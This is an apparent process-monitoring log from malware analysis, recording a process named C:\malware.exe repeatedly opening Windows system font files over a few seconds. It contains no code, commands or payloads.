29/2/2020 - 1:46:33.825Open1480C:\malware.exeC:\Windows\Fonts\upcdi.ttf
29/2/2020 - 1:46:33.825Open1480C:\malware.exeC:\Windows\Fonts\upcdb.ttf
29/2/2020 - 1:46:33.825Open1480C:\malware.exeC:\Windows\Fonts\upcdb.ttf
29/2/2020 - 1:46:33.825Open1480C:\malware.exeC:\Windows\Fonts\upcdb.ttf
29/2/2020 - 1:46:33.918Open1480C:\malware.exeC:\Windows\Fonts\upcdb.ttf
29/2/2020 - 1:46:33.918Open1480C:\malware.exeC:\Windows\Fonts\upcdbi.ttf
29/2/2020 - 1:46:33.918Open1480C:\malware.exeC:\Windows\Fonts\upcdbi.ttf
29/2/2020 - 1:46:33.918Open1480C:\malware.exeC:\Windows\Fonts\upcdbi.ttf
29/2/2020 - 1:46:34.12Open1480C:\malware.exeC:\Windows\Fonts\upcdbi.ttf
29/2/2020 - 1:46:34.12Open1480C:\malware.exeC:\Windows\Fonts\upcel.ttf
29/2/2020 - 1:46:34.12Open1480C:\malware.exeC:\Windows\Fonts\upcel.ttf
29/2/2020 - 1:46:34.12Open1480C:\malware.exeC:\Windows\Fonts\upcel.ttf
29/2/2020 - 1:46:34.106Open1480C:\malware.exeC:\Windows\Fonts\upcel.ttf
29/2/2020 - 1:46:34.106Open1480C:\malware.exeC:\Windows\Fonts\upcei.ttf
29/2/2020 - 1:46:34.106Open1480C:\malware.exeC:\Windows\Fonts\upcei.ttf
29/2/2020 - 1:46:34.106Open1480C:\malware.exeC:\Windows\Fonts\upcei.ttf
29/2/2020 - 1:46:34.200Open1480C:\malware.exeC:\Windows\Fonts\upcei.ttf
29/2/2020 - 1:46:34.200Open1480C:\malware.exeC:\Windows\Fonts\upceb.ttf
29/2/2020 - 1:46:34.200Open1480C:\malware.exeC:\Windows\Fonts\upceb.ttf
29/2/2020 - 1:46:34.200Open1480C:\malware.exeC:\Windows\Fonts\upceb.ttf
29/2/2020 - 1:46:34.293Open1480C:\malware.exeC:\Windows\Fonts\upceb.ttf
29/2/2020 - 1:46:34.293Open1480C:\malware.exeC:\Windows\Fonts\upcebi.ttf
29/2/2020 - 1:46:34.293Open1480C:\malware.exeC:\Windows\Fonts\upcebi.ttf
29/2/2020 - 1:46:34.293Open1480C:\malware.exeC:\Windows\Fonts\upcebi.ttf
29/2/2020 - 1:46:34.387Open1480C:\malware.exeC:\Windows\Fonts\upcebi.ttf
29/2/2020 - 1:46:34.387Open1480C:\malware.exeC:\Windows\Fonts\upcfl.ttf
29/2/2020 - 1:46:34.387Open1480C:\malware.exeC:\Windows\Fonts\upcfl.ttf
29/2/2020 - 1:46:34.387Open1480C:\malware.exeC:\Windows\Fonts\upcfl.ttf
29/2/2020 - 1:46:34.481Open1480C:\malware.exeC:\Windows\Fonts\upcfl.ttf
29/2/2020 - 1:46:34.481Open1480C:\malware.exeC:\Windows\Fonts\upcfi.ttf
29/2/2020 - 1:46:34.481Open1480C:\malware.exeC:\Windows\Fonts\upcfi.ttf
29/2/2020 - 1:46:34.481Open1480C:\malware.exeC:\Windows\Fonts\upcfi.ttf
29/2/2020 - 1:46:34.575Open1480C:\malware.exeC:\Windows\Fonts\upcfi.ttf
29/2/2020 - 1:46:34.575Open1480C:\malware.exeC:\Windows\Fonts\upcfb.ttf
29/2/2020 - 1:46:34.575Open1480C:\malware.exeC:\Windows\Fonts\upcfb.ttf
29/2/2020 - 1:46:34.575Open1480C:\malware.exeC:\Windows\Fonts\upcfb.ttf
29/2/2020 - 1:46:34.668Open1480C:\malware.exeC:\Windows\Fonts\upcfb.ttf
29/2/2020 - 1:46:34.668Open1480C:\malware.exeC:\Windows\Fonts\upcfbi.ttf
29/2/2020 - 1:46:34.668Open1480C:\malware.exeC:\Windows\Fonts\upcfbi.ttf
29/2/2020 - 1:46:34.668Open1480C:\malware.exeC:\Windows\Fonts\upcfbi.ttf
29/2/2020 - 1:46:34.762Open1480C:\malware.exeC:\Windows\Fonts\upcfbi.ttf
29/2/2020 - 1:46:34.762Open1480C:\malware.exeC:\Windows\Fonts\upcil.ttf
29/2/2020 - 1:46:34.762Open1480C:\malware.exeC:\Windows\Fonts\upcil.ttf
29/2/2020 - 1:46:34.762Open1480C:\malware.exeC:\Windows\Fonts\upcil.ttf
29/2/2020 - 1:46:34.856Open1480C:\malware.exeC:\Windows\Fonts\upcil.ttf
29/2/2020 - 1:46:34.856Open1480C:\malware.exeC:\Windows\Fonts\upcii.ttf
29/2/2020 - 1:46:34.856Open1480C:\malware.exeC:\Windows\Fonts\upcii.ttf
29/2/2020 - 1:46:34.856Open1480C:\malware.exeC:\Windows\Fonts\upcii.ttf
29/2/2020 - 1:46:34.950Open1480C:\malware.exeC:\Windows\Fonts\upcii.ttf
29/2/2020 - 1:46:34.950Open1480C:\malware.exeC:\Windows\Fonts\upcib.ttf
29/2/2020 - 1:46:34.950Open1480C:\malware.exeC:\Windows\Fonts\upcib.ttf
29/2/2020 - 1:46:34.950Open1480C:\malware.exeC:\Windows\Fonts\upcib.ttf
29/2/2020 - 1:46:35.43Open1480C:\malware.exeC:\Windows\Fonts\upcib.ttf
29/2/2020 - 1:46:35.43Open1480C:\malware.exeC:\Windows\Fonts\upcibi.ttf
29/2/2020 - 1:46:35.43Open1480C:\malware.exeC:\Windows\Fonts\upcibi.ttf
29/2/2020 - 1:46:35.43Open1480C:\malware.exeC:\Windows\Fonts\upcibi.ttf
29/2/2020 - 1:46:35.137Open1480C:\malware.exeC:\Windows\Fonts\upcibi.ttf
29/2/2020 - 1:46:35.137Open1480C:\malware.exeC:\Windows\Fonts\upcjl.ttf
29/2/2020 - 1:46:35.137Open1480C:\malware.exeC:\Windows\Fonts\upcjl.ttf
29/2/2020 - 1:46:35.137Open1480C:\malware.exeC:\Windows\Fonts\upcjl.ttf
29/2/2020 - 1:46:35.231Open1480C:\malware.exeC:\Windows\Fonts\upcjl.ttf
29/2/2020 - 1:46:35.231Open1480C:\malware.exeC:\Windows\Fonts\upcji.ttf
29/2/2020 - 1:46:35.231Open1480C:\malware.exeC:\Windows\Fonts\upcji.ttf
29/2/2020 - 1:46:35.231Open1480C:\malware.exeC:\Windows\Fonts\upcji.ttf
29/2/2020 - 1:46:35.325Open1480C:\malware.exeC:\Windows\Fonts\upcji.ttf
29/2/2020 - 1:46:35.325Open1480C:\malware.exeC:\Windows\Fonts\upcjb.ttf
29/2/2020 - 1:46:35.325Open1480C:\malware.exeC:\Windows\Fonts\upcjb.ttf
29/2/2020 - 1:46:35.325Open1480C:\malware.exeC:\Windows\Fonts\upcjb.ttf
29/2/2020 - 1:46:35.418Open1480C:\malware.exeC:\Windows\Fonts\upcjb.ttf
29/2/2020 - 1:46:35.418Open1480C:\malware.exeC:\Windows\Fonts\upcjbi.ttf
29/2/2020 - 1:46:35.418Open1480C:\malware.exeC:\Windows\Fonts\upcjbi.ttf
29/2/2020 - 1:46:35.418Open1480C:\malware.exeC:\Windows\Fonts\upcjbi.ttf
29/2/2020 - 1:46:35.512Open1480C:\malware.exeC:\Windows\Fonts\upcjbi.ttf
29/2/2020 - 1:46:35.512Open1480C:\malware.exeC:\Windows\Fonts\upckl.ttf
29/2/2020 - 1:46:35.512Open1480C:\malware.exeC:\Windows\Fonts\upckl.ttf
29/2/2020 - 1:46:35.512Open1480C:\malware.exeC:\Windows\Fonts\upckl.ttf
29/2/2020 - 1:46:35.606Open1480C:\malware.exeC:\Windows\Fonts\upckl.ttf
29/2/2020 - 1:46:35.606Open1480C:\malware.exeC:\Windows\Fonts\upcki.ttf
29/2/2020 - 1:46:35.606Open1480C:\malware.exeC:\Windows\Fonts\upcki.ttf
29/2/2020 - 1:46:35.606Open1480C:\malware.exeC:\Windows\Fonts\upcki.ttf
29/2/2020 - 1:46:35.700Open1480C:\malware.exeC:\Windows\Fonts\upcki.ttf
29/2/2020 - 1:46:35.700Open1480C:\malware.exeC:\Windows\Fonts\upckb.ttf
29/2/2020 - 1:46:35.700Open1480C:\malware.exeC:\Windows\Fonts\upckb.ttf
29/2/2020 - 1:46:35.700Open1480C:\malware.exeC:\Windows\Fonts\upckb.ttf
29/2/2020 - 1:46:35.793Open1480C:\malware.exeC:\Windows\Fonts\upckb.ttf
29/2/2020 - 1:46:35.793Open1480C:\malware.exeC:\Windows\Fonts\upckbi.ttf
29/2/2020 - 1:46:35.793Open1480C:\malware.exeC:\Windows\Fonts\upckbi.ttf
29/2/2020 - 1:46:35.793Open1480C:\malware.exeC:\Windows\Fonts\upckbi.ttf
29/2/2020 - 1:46:35.887Open1480C:\malware.exeC:\Windows\Fonts\upckbi.ttf
29/2/2020 - 1:46:35.887Open1480C:\malware.exeC:\Windows\Fonts\upcll.ttf
29/2/2020 - 1:46:35.887Open1480C:\malware.exeC:\Windows\Fonts\upcll.ttf
29/2/2020 - 1:46:35.887Open1480C:\malware.exeC:\Windows\Fonts\upcll.ttf
29/2/2020 - 1:46:35.981Open1480C:\malware.exeC:\Windows\Fonts\upcll.ttf
29/2/2020 - 1:46:35.981Open1480C:\malware.exeC:\Windows\Fonts\upcli.ttf
29/2/2020 - 1:46:35.981Open1480C:\malware.exeC:\Windows\Fonts\upcli.ttf
29/2/2020 - 1:46:35.981Open1480C:\malware.exeC:\Windows\Fonts\upcli.ttf
29/2/2020 - 1:46:36.75Open1480C:\malware.exeC:\Windows\Fonts\upcli.ttf
29/2/2020 - 1:46:36.75Open1480C:\malware.exeC:\Windows\Fonts\upclb.ttf
29/2/2020 - 1:46:36.75Open1480C:\malware.exeC:\Windows\Fonts\upclb.ttf
29/2/2020 - 1:46:36.75Open1480C:\malware.exeC:\Windows\Fonts\upclb.ttf
29/2/2020 - 1:46:36.168Open1480C:\malware.exeC:\Windows\Fonts\upclb.ttf
29/2/2020 - 1:46:36.168Open1480C:\malware.exeC:\Windows\Fonts\upclbi.ttf
29/2/2020 - 1:46:36.168Open1480C:\malware.exeC:\Windows\Fonts\upclbi.ttf
29/2/2020 - 1:46:36.168Open1480C:\malware.exeC:\Windows\Fonts\upclbi.ttf
29/2/2020 - 1:46:36.262Open1480C:\malware.exeC:\Windows\Fonts\upclbi.ttf
29/2/2020 - 1:46:36.262Open1480C:\malware.exeC:\Windows\Fonts\kaiu.ttf
29/2/2020 - 1:46:36.262Open1480C:\malware.exeC:\Windows\Fonts\kaiu.ttf
29/2/2020 - 1:46:36.262Open1480C:\malware.exeC:\Windows\Fonts\kaiu.ttf
29/2/2020 - 1:46:36.543Open1480C:\malware.exeC:\Windows\Fonts\kaiu.ttf
29/2/2020 - 1:46:36.684Open1480C:\malware.exeC:\Windows\Fonts\l_10646.ttf
29/2/2020 - 1:46:36.684Open1480C:\malware.exeC:\Windows\Fonts\l_10646.ttf
29/2/2020 - 1:46:36.684Open1480C:\malware.exeC:\Windows\Fonts\l_10646.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\l_10646.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\ariblk.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\ariblk.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\ariblk.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\ariblk.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\calibri.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\calibri.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\calibri.ttf
29/2/2020 - 1:46:36.872Open1480C:\malware.exeC:\Windows\Fonts\calibri.ttf
29/2/2020 - 1:46:37.59Open1480C:\malware.exeC:\Windows\Fonts\calibrii.ttf
29/2/2020 - 1:46:37.59Open1480C:\malware.exeC:\Windows\Fonts\calibrii.ttf
29/2/2020 - 1:46:37.59Open1480C:\malware.exeC:\Windows\Fonts\calibrii.ttf
29/2/2020 - 1:46:37.200Open1480C:\malware.exeC:\Windows\Fonts\calibrii.ttf
29/2/2020 - 1:46:37.387Open1480C:\malware.exeC:\Windows\Fonts\calibrib.ttf
29/2/2020 - 1:46:37.387Open1480C:\malware.exeC:\Windows\Fonts\calibrib.ttf
29/2/2020 - 1:46:37.387Open1480C:\malware.exeC:\Windows\Fonts\calibrib.ttf
29/2/2020 - 1:46:37.528Open1480C:\malware.exeC:\Windows\Fonts\calibrib.ttf
29/2/2020 - 1:46:37.715Open1480C:\malware.exeC:\Windows\Fonts\calibriz.ttf
29/2/2020 - 1:46:37.715Open1480C:\malware.exeC:\Windows\Fonts\calibriz.ttf
29/2/2020 - 1:46:37.715Open1480C:\malware.exeC:\Windows\Fonts\calibriz.ttf
29/2/2020 - 1:46:37.856Open1480C:\malware.exeC:\Windows\Fonts\calibriz.ttf
29/2/2020 - 1:46:38.43Open1480C:\malware.exeC:\Windows\Fonts\cambria.ttc
29/2/2020 - 1:46:38.43Open1480C:\malware.exeC:\Windows\Fonts\cambria.ttc
29/2/2020 - 1:46:38.43Open1480C:\malware.exeC:\Windows\Fonts\cambria.ttc
29/2/2020 - 1:46:38.372Open1480C:\malware.exeC:\Windows\Fonts\cambria.ttc
29/2/2020 - 1:46:38.606Open1480C:\malware.exeC:\Windows\Fonts\cambria.ttc
29/2/2020 - 1:46:38.903Open1480C:\malware.exeC:\Windows\Fonts\cambriai.ttf
29/2/2020 - 1:46:38.903Open1480C:\malware.exeC:\Windows\Fonts\cambriai.ttf
29/2/2020 - 1:46:38.903Open1480C:\malware.exeC:\Windows\Fonts\cambriai.ttf
29/2/2020 - 1:46:39.43Open1480C:\malware.exeC:\Windows\Fonts\cambriai.ttf
29/2/2020 - 1:46:39.278Open1480C:\malware.exeC:\Windows\Fonts\cambriab.ttf
29/2/2020 - 1:46:39.278Open1480C:\malware.exeC:\Windows\Fonts\cambriab.ttf
29/2/2020 - 1:46:39.278Open1480C:\malware.exeC:\Windows\Fonts\cambriab.ttf
29/2/2020 - 1:46:39.418Open1480C:\malware.exeC:\Windows\Fonts\cambriab.ttf
29/2/2020 - 1:46:39.747Open1480C:\malware.exeC:\Windows\Fonts\cambriaz.ttf
29/2/2020 - 1:46:39.747Open1480C:\malware.exeC:\Windows\Fonts\cambriaz.ttf
29/2/2020 - 1:46:39.747Open1480C:\malware.exeC:\Windows\Fonts\cambriaz.ttf
29/2/2020 - 1:46:39.887Open1480C:\malware.exeC:\Windows\Fonts\cambriaz.ttf
29/2/2020 - 1:46:40.122Open1480C:\malware.exeC:\Windows\Fonts\Candara.ttf
29/2/2020 - 1:46:40.122Open1480C:\malware.exeC:\Windows\Fonts\Candara.ttf
29/2/2020 - 1:46:40.122Open1480C:\malware.exeC:\Windows\Fonts\Candara.ttf
29/2/2020 - 1:46:40.215Open1480C:\malware.exeC:\Windows\Fonts\Candara.ttf
29/2/2020 - 1:46:40.215Open1480C:\malware.exeC:\Windows\Fonts\Candarai.ttf
29/2/2020 - 1:46:40.215Open1480C:\malware.exeC:\Windows\Fonts\Candarai.ttf
29/2/2020 - 1:46:40.215Open1480C:\malware.exeC:\Windows\Fonts\Candarai.ttf
29/2/2020 - 1:46:40.309Open1480C:\malware.exeC:\Windows\Fonts\Candarai.ttf
29/2/2020 - 1:46:40.309Open1480C:\malware.exeC:\Windows\Fonts\Candarab.ttf
29/2/2020 - 1:46:40.309Open1480C:\malware.exeC:\Windows\Fonts\Candarab.ttf
29/2/2020 - 1:46:40.309Open1480C:\malware.exeC:\Windows\Fonts\Candarab.ttf
29/2/2020 - 1:46:40.403Open1480C:\malware.exeC:\Windows\Fonts\Candarab.ttf
29/2/2020 - 1:46:40.403Open1480C:\malware.exeC:\Windows\Fonts\Candaraz.ttf
29/2/2020 - 1:46:40.403Open1480C:\malware.exeC:\Windows\Fonts\Candaraz.ttf
29/2/2020 - 1:46:40.403Open1480C:\malware.exeC:\Windows\Fonts\Candaraz.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\Candaraz.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comic.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comic.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comic.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comic.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comicbd.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comicbd.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comicbd.ttf
29/2/2020 - 1:46:40.590Open1480C:\malware.exeC:\Windows\Fonts\comicbd.ttf
29/2/2020 - 1:46:40.590Open1480C:\malware.exeC:\Windows\Fonts\consola.ttf
29/2/2020 - 1:46:40.590Open1480C:\malware.exeC:\Windows\Fonts\consola.ttf
29/2/2020 - 1:46:40.590Open1480C:\malware.exeC:\Windows\Fonts\consola.ttf
29/2/2020 - 1:46:40.731Open1480C:\malware.exeC:\Windows\Fonts\consola.ttf
29/2/2020 - 1:46:40.778Open1480C:\malware.exeC:\Windows\Fonts\consolai.ttf
29/2/2020 - 1:46:40.778Open1480C:\malware.exeC:\Windows\Fonts\consolai.ttf
29/2/2020 - 1:46:40.778Open1480C:\malware.exeC:\Windows\Fonts\consolai.ttf
29/2/2020 - 1:46:40.918Open1480C:\malware.exeC:\Windows\Fonts\consolai.ttf
29/2/2020 - 1:46:40.965Open1480C:\malware.exeC:\Windows\Fonts\consolab.ttf
29/2/2020 - 1:46:40.965Open1480C:\malware.exeC:\Windows\Fonts\consolab.ttf
29/2/2020 - 1:46:40.965Open1480C:\malware.exeC:\Windows\Fonts\consolab.ttf
29/2/2020 - 1:46:41.106Open1480C:\malware.exeC:\Windows\Fonts\consolab.ttf
29/2/2020 - 1:46:41.153Open1480C:\malware.exeC:\Windows\Fonts\consolaz.ttf
29/2/2020 - 1:46:41.153Open1480C:\malware.exeC:\Windows\Fonts\consolaz.ttf
29/2/2020 - 1:46:41.153Open1480C:\malware.exeC:\Windows\Fonts\consolaz.ttf
29/2/2020 - 1:46:41.293Open1480C:\malware.exeC:\Windows\Fonts\consolaz.ttf
29/2/2020 - 1:46:41.340Open1480C:\malware.exeC:\Windows\Fonts\constan.ttf
29/2/2020 - 1:46:41.340Open1480C:\malware.exeC:\Windows\Fonts\constan.ttf
29/2/2020 - 1:46:41.340Open1480C:\malware.exeC:\Windows\Fonts\constan.ttf
29/2/2020 - 1:46:41.434Open1480C:\malware.exeC:\Windows\Fonts\constan.ttf
29/2/2020 - 1:46:41.528Open1480C:\malware.exeC:\Windows\Fonts\constani.ttf
29/2/2020 - 1:46:41.528Open1480C:\malware.exeC:\Windows\Fonts\constani.ttf
29/2/2020 - 1:46:41.528Open1480C:\malware.exeC:\Windows\Fonts\constani.ttf
29/2/2020 - 1:46:41.622Open1480C:\malware.exeC:\Windows\Fonts\constani.ttf
29/2/2020 - 1:46:41.715Open1480C:\malware.exeC:\Windows\Fonts\constanb.ttf
29/2/2020 - 1:46:41.715Open1480C:\malware.exeC:\Windows\Fonts\constanb.ttf
29/2/2020 - 1:46:41.715Open1480C:\malware.exeC:\Windows\Fonts\constanb.ttf
29/2/2020 - 1:46:41.809Open1480C:\malware.exeC:\Windows\Fonts\constanb.ttf
29/2/2020 - 1:46:41.903Open1480C:\malware.exeC:\Windows\Fonts\constanz.ttf
29/2/2020 - 1:46:41.903Open1480C:\malware.exeC:\Windows\Fonts\constanz.ttf
29/2/2020 - 1:46:41.903Open1480C:\malware.exeC:\Windows\Fonts\constanz.ttf
29/2/2020 - 1:46:41.997Open1480C:\malware.exeC:\Windows\Fonts\constanz.ttf
29/2/2020 - 1:46:42.90Open1480C:\malware.exeC:\Windows\Fonts\corbel.ttf
29/2/2020 - 1:46:42.90Open1480C:\malware.exeC:\Windows\Fonts\corbel.ttf
29/2/2020 - 1:46:42.90Open1480C:\malware.exeC:\Windows\Fonts\corbel.ttf
29/2/2020 - 1:46:42.184Open1480C:\malware.exeC:\Windows\Fonts\corbel.ttf
29/2/2020 - 1:46:42.231Open1480C:\malware.exeC:\Windows\Fonts\corbeli.ttf
29/2/2020 - 1:46:42.231Open1480C:\malware.exeC:\Windows\Fonts\corbeli.ttf
29/2/2020 - 1:46:42.231Open1480C:\malware.exeC:\Windows\Fonts\corbeli.ttf
29/2/2020 - 1:46:42.325Open1480C:\malware.exeC:\Windows\Fonts\corbeli.ttf
29/2/2020 - 1:46:42.372Open1480C:\malware.exeC:\Windows\Fonts\corbelb.ttf
29/2/2020 - 1:46:42.372Open1480C:\malware.exeC:\Windows\Fonts\corbelb.ttf
29/2/2020 - 1:46:42.372Open1480C:\malware.exeC:\Windows\Fonts\corbelb.ttf
29/2/2020 - 1:46:42.465Open1480C:\malware.exeC:\Windows\Fonts\corbelb.ttf
29/2/2020 - 1:46:42.512Open1480C:\malware.exeC:\Windows\Fonts\corbelz.ttf
29/2/2020 - 1:46:42.512Open1480C:\malware.exeC:\Windows\Fonts\corbelz.ttf
29/2/2020 - 1:46:42.512Open1480C:\malware.exeC:\Windows\Fonts\corbelz.ttf
29/2/2020 - 1:46:42.606Open1480C:\malware.exeC:\Windows\Fonts\corbelz.ttf
29/2/2020 - 1:46:42.653Open1480C:\malware.exeC:\Windows\Fonts\framd.ttf
29/2/2020 - 1:46:42.653Open1480C:\malware.exeC:\Windows\Fonts\framd.ttf
29/2/2020 - 1:46:42.653Open1480C:\malware.exeC:\Windows\Fonts\framd.ttf
29/2/2020 - 1:46:42.747Open1480C:\malware.exeC:\Windows\Fonts\framd.ttf
29/2/2020 - 1:46:42.747Open1480C:\malware.exeC:\Windows\Fonts\framdit.ttf
29/2/2020 - 1:46:42.747Open1480C:\malware.exeC:\Windows\Fonts\framdit.ttf
29/2/2020 - 1:46:42.747Open1480C:\malware.exeC:\Windows\Fonts\framdit.ttf
29/2/2020 - 1:46:42.840Open1480C:\malware.exeC:\Windows\Fonts\framdit.ttf
29/2/2020 - 1:46:42.840Open1480C:\malware.exeC:\Windows\Fonts\Gabriola.ttf
29/2/2020 - 1:46:42.840Open1480C:\malware.exeC:\Windows\Fonts\Gabriola.ttf
29/2/2020 - 1:46:42.840Open1480C:\malware.exeC:\Windows\Fonts\Gabriola.ttf
29/2/2020 - 1:46:42.981Open1480C:\malware.exeC:\Windows\Fonts\Gabriola.ttf
29/2/2020 - 1:46:44.575Open1480C:\malware.exeC:\Windows\Fonts\georgia.ttf
29/2/2020 - 1:46:44.575Open1480C:\malware.exeC:\Windows\Fonts\georgia.ttf
29/2/2020 - 1:46:44.575Open1480C:\malware.exeC:\Windows\Fonts\georgia.ttf
29/2/2020 - 1:46:44.668Open1480C:\malware.exeC:\Windows\Fonts\georgia.ttf
29/2/2020 - 1:46:44.668Open1480C:\malware.exeC:\Windows\Fonts\georgiai.ttf
29/2/2020 - 1:46:44.668Open1480C:\malware.exeC:\Windows\Fonts\georgiai.ttf
29/2/2020 - 1:46:44.668Open1480C:\malware.exeC:\Windows\Fonts\georgiai.ttf
29/2/2020 - 1:46:44.762Open1480C:\malware.exeC:\Windows\Fonts\georgiai.ttf
29/2/2020 - 1:46:44.762Open1480C:\malware.exeC:\Windows\Fonts\georgiab.ttf
29/2/2020 - 1:46:44.762Open1480C:\malware.exeC:\Windows\Fonts\georgiab.ttf
29/2/2020 - 1:46:44.762Open1480C:\malware.exeC:\Windows\Fonts\georgiab.ttf
29/2/2020 - 1:46:44.856Open1480C:\malware.exeC:\Windows\Fonts\georgiab.ttf
29/2/2020 - 1:46:44.856Open1480C:\malware.exeC:\Windows\Fonts\georgiaz.ttf
29/2/2020 - 1:46:44.856Open1480C:\malware.exeC:\Windows\Fonts\georgiaz.ttf
29/2/2020 - 1:46:44.856Open1480C:\malware.exeC:\Windows\Fonts\georgiaz.ttf
29/2/2020 - 1:46:44.950Open1480C:\malware.exeC:\Windows\Fonts\georgiaz.ttf
29/2/2020 - 1:46:44.950Open1480C:\malware.exeC:\Windows\Fonts\pala.ttf
29/2/2020 - 1:46:44.950Open1480C:\malware.exeC:\Windows\Fonts\pala.ttf
29/2/2020 - 1:46:44.950Open1480C:\malware.exeC:\Windows\Fonts\pala.ttf
29/2/2020 - 1:46:45.90Open1480C:\malware.exeC:\Windows\Fonts\pala.ttf
29/2/2020 - 1:46:45.90Open1480C:\malware.exeC:\Windows\Fonts\palai.ttf
29/2/2020 - 1:46:45.90Open1480C:\malware.exeC:\Windows\Fonts\palai.ttf
29/2/2020 - 1:46:45.90Open1480C:\malware.exeC:\Windows\Fonts\palai.ttf
29/2/2020 - 1:46:45.231Open1480C:\malware.exeC:\Windows\Fonts\palai.ttf
29/2/2020 - 1:46:45.231Open1480C:\malware.exeC:\Windows\Fonts\palab.ttf
29/2/2020 - 1:46:45.231Open1480C:\malware.exeC:\Windows\Fonts\palab.ttf
29/2/2020 - 1:46:45.231Open1480C:\malware.exeC:\Windows\Fonts\palab.ttf
29/2/2020 - 1:46:45.372Open1480C:\malware.exeC:\Windows\Fonts\palab.ttf
29/2/2020 - 1:46:45.372Open1480C:\malware.exeC:\Windows\Fonts\palabi.ttf
29/2/2020 - 1:46:45.372Open1480C:\malware.exeC:\Windows\Fonts\palabi.ttf
29/2/2020 - 1:46:45.372Open1480C:\malware.exeC:\Windows\Fonts\palabi.ttf
29/2/2020 - 1:46:45.512Open1480C:\malware.exeC:\Windows\Fonts\palabi.ttf
29/2/2020 - 1:46:45.512Open1480C:\malware.exeC:\Windows\Fonts\segoepr.ttf
29/2/2020 - 1:46:45.512Open1480C:\malware.exeC:\Windows\Fonts\segoepr.ttf
29/2/2020 - 1:46:45.512Open1480C:\malware.exeC:\Windows\Fonts\segoepr.ttf
29/2/2020 - 1:46:45.606Open1480C:\malware.exeC:\Windows\Fonts\segoepr.ttf
29/2/2020 - 1:46:45.606Open1480C:\malware.exeC:\Windows\Fonts\segoeprb.ttf
29/2/2020 - 1:46:45.606Open1480C:\malware.exeC:\Windows\Fonts\segoeprb.ttf
29/2/2020 - 1:46:45.606Open1480C:\malware.exeC:\Windows\Fonts\segoeprb.ttf
29/2/2020 - 1:46:45.700Open1480C:\malware.exeC:\Windows\Fonts\segoeprb.ttf
29/2/2020 - 1:46:45.700Open1480C:\malware.exeC:\Windows\Fonts\trebuc.ttf
29/2/2020 - 1:46:45.700Open1480C:\malware.exeC:\Windows\Fonts\trebuc.ttf
29/2/2020 - 1:46:45.700Open1480C:\malware.exeC:\Windows\Fonts\trebuc.ttf
29/2/2020 - 1:46:45.793Open1480C:\malware.exeC:\Windows\Fonts\trebuc.ttf
29/2/2020 - 1:46:45.793Open1480C:\malware.exeC:\Windows\Fonts\trebucit.ttf
29/2/2020 - 1:46:45.793Open1480C:\malware.exeC:\Windows\Fonts\trebucit.ttf
29/2/2020 - 1:46:45.793Open1480C:\malware.exeC:\Windows\Fonts\trebucit.ttf
29/2/2020 - 1:46:45.887Open1480C:\malware.exeC:\Windows\Fonts\trebucit.ttf
29/2/2020 - 1:46:45.887Open1480C:\malware.exeC:\Windows\Fonts\trebucbd.ttf
29/2/2020 - 1:46:45.887Open1480C:\malware.exeC:\Windows\Fonts\trebucbd.ttf
29/2/2020 - 1:46:45.887Open1480C:\malware.exeC:\Windows\Fonts\trebucbd.ttf
29/2/2020 - 1:46:45.981Open1480C:\malware.exeC:\Windows\Fonts\trebucbd.ttf
29/2/2020 - 1:46:45.981Open1480C:\malware.exeC:\Windows\Fonts\trebucbi.ttf
29/2/2020 - 1:46:45.981Open1480C:\malware.exeC:\Windows\Fonts\trebucbi.ttf
29/2/2020 - 1:46:45.981Open1480C:\malware.exeC:\Windows\Fonts\trebucbi.ttf
29/2/2020 - 1:46:46.75Open1480C:\malware.exeC:\Windows\Fonts\trebucbi.ttf
29/2/2020 - 1:46:46.75Open1480C:\malware.exeC:\Windows\Fonts\verdana.ttf
29/2/2020 - 1:46:46.75Open1480C:\malware.exeC:\Windows\Fonts\verdana.ttf
29/2/2020 - 1:46:46.75Open1480C:\malware.exeC:\Windows\Fonts\verdana.ttf
29/2/2020 - 1:46:46.215Open1480C:\malware.exeC:\Windows\Fonts\verdana.ttf
29/2/2020 - 1:46:46.215Open1480C:\malware.exeC:\Windows\Fonts\verdanai.ttf
29/2/2020 - 1:46:46.215Open1480C:\malware.exeC:\Windows\Fonts\verdanai.ttf
29/2/2020 - 1:46:46.215Open1480C:\malware.exeC:\Windows\Fonts\verdanai.ttf
29/2/2020 - 1:46:46.356Open1480C:\malware.exeC:\Windows\Fonts\verdanai.ttf
29/2/2020 - 1:46:46.356Open1480C:\malware.exeC:\Windows\Fonts\verdanab.ttf
29/2/2020 - 1:46:46.356Open1480C:\malware.exeC:\Windows\Fonts\verdanab.ttf
29/2/2020 - 1:46:46.356Open1480C:\malware.exeC:\Windows\Fonts\verdanab.ttf
29/2/2020 - 1:46:46.497Open1480C:\malware.exeC:\Windows\Fonts\verdanab.ttf
29/2/2020 - 1:46:46.497Open1480C:\malware.exeC:\Windows\Fonts\verdanaz.ttf
29/2/2020 - 1:46:46.497Open1480C:\malware.exeC:\Windows\Fonts\verdanaz.ttf
29/2/2020 - 1:46:46.497Open1480C:\malware.exeC:\Windows\Fonts\verdanaz.ttf
29/2/2020 - 1:46:46.637Open1480C:\malware.exeC:\Windows\Fonts\verdanaz.ttf
29/2/2020 - 1:46:46.637Open1480C:\malware.exeC:\Windows\Fonts\webdings.ttf
29/2/2020 - 1:46:46.637Open1480C:\malware.exeC:\Windows\Fonts\webdings.ttf
